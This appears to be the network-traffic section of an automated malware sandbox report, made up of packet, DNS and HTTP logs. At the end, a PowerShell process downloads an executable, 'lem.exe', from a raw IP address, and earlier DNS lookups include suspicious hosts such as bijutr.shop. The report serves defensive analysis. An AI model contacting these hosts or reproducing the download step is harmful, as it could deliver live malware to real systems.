                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.923353910 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.057656050 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.191718102 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.191796064 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.191860914 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.192395926 CET50091443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.192411900 CET44350091162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.265608072 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.265700102 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.265777111 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.265995026 CET50092443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.266006947 CET44350092162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.313486099 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.313678026 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.313776016 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.313853979 CET50093443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.313874006 CET44350093162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.575809002 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576020956 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576040983 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576142073 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576395035 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576416016 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576437950 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576751947 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.576824903 CET44350098162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.577006102 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.577334881 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.577451944 CET44350097162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.681598902 CET50098443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.771240950 CET50097443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.873754025 CET44350102162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.876852036 CET44350101162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.962352037 CET50102443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:16.026222944 CET50101443192.168.2.6162.159.61.3

                                                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:51.825072050 CET5128853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:51.962562084 CET53512881.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:32.237993956 CET5135953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:32.374802113 CET53513591.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.367162943 CET6334853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.504589081 CET53633481.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.382692099 CET53648781.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.392527103 CET5998053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.392663002 CET6063353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.411834002 CET53584441.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.529781103 CET53606331.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.529934883 CET53599801.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:54.550973892 CET53522841.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:55.661830902 CET53622371.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:56.019933939 CET53563321.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:06.336131096 CET5197953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:06.336451054 CET5710953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:06.473479986 CET53571091.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.762275934 CET6541153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.762413025 CET5161753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.416280031 CET6331153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.416443110 CET6030553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.553447962 CET53633111.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.553524971 CET53603051.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.137336016 CET5839853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.137485027 CET5456653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.137864113 CET5615853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.138179064 CET5202853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.150505066 CET5538653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.150830984 CET5420353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.274194002 CET53545661.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.274358034 CET53583981.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.274832010 CET53520281.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.275156021 CET53561581.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.287512064 CET53553861.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.287861109 CET53542031.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.613379955 CET6362353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.613512993 CET5233753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.632344007 CET5622653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.632776022 CET6328753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.750108957 CET53636231.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.751132965 CET53523371.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.769052982 CET5937953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.769191980 CET5527153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.922672987 CET5972753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.923252106 CET5961853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.983995914 CET53552711.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.061940908 CET53596181.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.321597099 CET50752443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.354638100 CET62307443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.622800112 CET50752443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:14.661488056 CET62307443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.223129034 CET50752443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.265542984 CET62307443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.414268017 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.414280891 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.415282011 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.415466070 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.415477037 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.415884972 CET50752443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.417336941 CET50752443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.420489073 CET50752443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.475297928 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.475311041 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.477950096 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.478032112 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.478044987 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.478579998 CET62307443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.479875088 CET62307443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.490250111 CET62307443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.546364069 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.579266071 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.740457058 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.740566969 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.740577936 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.740586042 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.741014004 CET50752443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.741080999 CET50752443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.744400024 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.777221918 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.777302027 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.793441057 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.793493032 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.793503046 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.793512106 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.805021048 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.819291115 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:15.819466114 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:16.069010973 CET44350752162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:16.787367105 CET44362307162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:17.141377926 CET44350752162.159.61.3192.168.2.6

                                                                                                                                                                                                                                                                            ICMP Packets

                                                                                                                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.510384083 CET192.168.2.61.1.1.1c235(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:10.658396006 CET192.168.2.61.1.1.1c29a(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:51.825072050 CET192.168.2.61.1.1.10x71a4Standard query (0)sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:32.237993956 CET192.168.2.61.1.1.10xcba4Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.367162943 CET192.168.2.61.1.1.10x2d53Standard query (0)bijutr.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.392527103 CET192.168.2.61.1.1.10xfeb4Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.392663002 CET192.168.2.61.1.1.10xb376Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:06.336131096 CET192.168.2.61.1.1.10x9e3fStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:06.336451054 CET192.168.2.61.1.1.10x4194Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.762275934 CET192.168.2.61.1.1.10x81edStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.762413025 CET192.168.2.61.1.1.10x8384Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.416280031 CET192.168.2.61.1.1.10xf5d5Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.416443110 CET192.168.2.61.1.1.10x234Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.137336016 CET192.168.2.61.1.1.10xf85fStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.137485027 CET192.168.2.61.1.1.10x7c27Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.137864113 CET192.168.2.61.1.1.10xa2e3Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.138179064 CET192.168.2.61.1.1.10xc0baStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.150505066 CET192.168.2.61.1.1.10x84fdStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.150830984 CET192.168.2.61.1.1.10x76d4Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.613379955 CET192.168.2.61.1.1.10x920cStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.613512993 CET192.168.2.61.1.1.10xb5abStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.632344007 CET192.168.2.61.1.1.10x7decStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.632776022 CET192.168.2.61.1.1.10x62a2Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.769052982 CET192.168.2.61.1.1.10x67ccStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.769191980 CET192.168.2.61.1.1.10x8270Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.922672987 CET192.168.2.61.1.1.10x1fc4Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.923252106 CET192.168.2.61.1.1.10xf2baStandard query (0)api.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:42.367330074 CET1.1.1.1192.168.2.60x8e82No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:42.367330074 CET1.1.1.1192.168.2.60x8e82No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:42.367330074 CET1.1.1.1192.168.2.60x8e82No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:51.962562084 CET1.1.1.1192.168.2.60x71a4Name error (3)sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:32.374802113 CET1.1.1.1192.168.2.60xcba4No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:34.504589081 CET1.1.1.1192.168.2.60x2d53No error (0)bijutr.shop188.245.216.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.529781103 CET1.1.1.1192.168.2.60xb376No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:10:51.529934883 CET1.1.1.1192.168.2.60xfeb4No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:06.473218918 CET1.1.1.1192.168.2.60x9e3fNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:06.473479986 CET1.1.1.1192.168.2.60x4194No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:06.605832100 CET1.1.1.1192.168.2.60xe9ccNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:06.605832100 CET1.1.1.1192.168.2.60xe9ccNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:06.605952024 CET1.1.1.1192.168.2.60x63c3No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.900527000 CET1.1.1.1192.168.2.60x8384No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:08.994267941 CET1.1.1.1192.168.2.60x81edNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.553447962 CET1.1.1.1192.168.2.60xf5d5No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.553447962 CET1.1.1.1192.168.2.60xf5d5No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:09.553524971 CET1.1.1.1192.168.2.60x234No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.274194002 CET1.1.1.1192.168.2.60x7c27No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.274358034 CET1.1.1.1192.168.2.60xf85fNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.274358034 CET1.1.1.1192.168.2.60xf85fNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.274832010 CET1.1.1.1192.168.2.60xc0baNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.275156021 CET1.1.1.1192.168.2.60xa2e3No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.275156021 CET1.1.1.1192.168.2.60xa2e3No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.287512064 CET1.1.1.1192.168.2.60x84fdNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.287512064 CET1.1.1.1192.168.2.60x84fdNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.287861109 CET1.1.1.1192.168.2.60x76d4No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.750108957 CET1.1.1.1192.168.2.60x920cNo error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.750108957 CET1.1.1.1192.168.2.60x920cNo error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.750108957 CET1.1.1.1192.168.2.60x920cNo error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.750108957 CET1.1.1.1192.168.2.60x920cNo error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.769383907 CET1.1.1.1192.168.2.60x7decNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.769881964 CET1.1.1.1192.168.2.60x62a2No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.905647039 CET1.1.1.1192.168.2.60x67ccNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.983995914 CET1.1.1.1192.168.2.60x8270No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.060117960 CET1.1.1.1192.168.2.60x1fc4No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.061940908 CET1.1.1.1192.168.2.60xf2baNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                            • tse1.mm.bing.net
                                                                                                                                                                                                                                                                            • t.me
                                                                                                                                                                                                                                                                            • bijutr.shop
                                                                                                                                                                                                                                                                            • www.google.com
                                                                                                                                                                                                                                                                            • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                            • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            • 5.252.155.64

                                                                                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            0192.168.2.6497735.252.155.64807456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:30.334574938 CET69OUTGET /lem.exe HTTP/1.1
                                                                                                                                                                                                                                                                            Host: 5.252.155.64
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:31.597779989 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:31 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                                            Last-Modified: Fri, 27 Dec 2024 04:44:48 GMT
                                                                                                                                                                                                                                                                            ETag: "136ffc-62a391f62da6d"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 1273852
                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
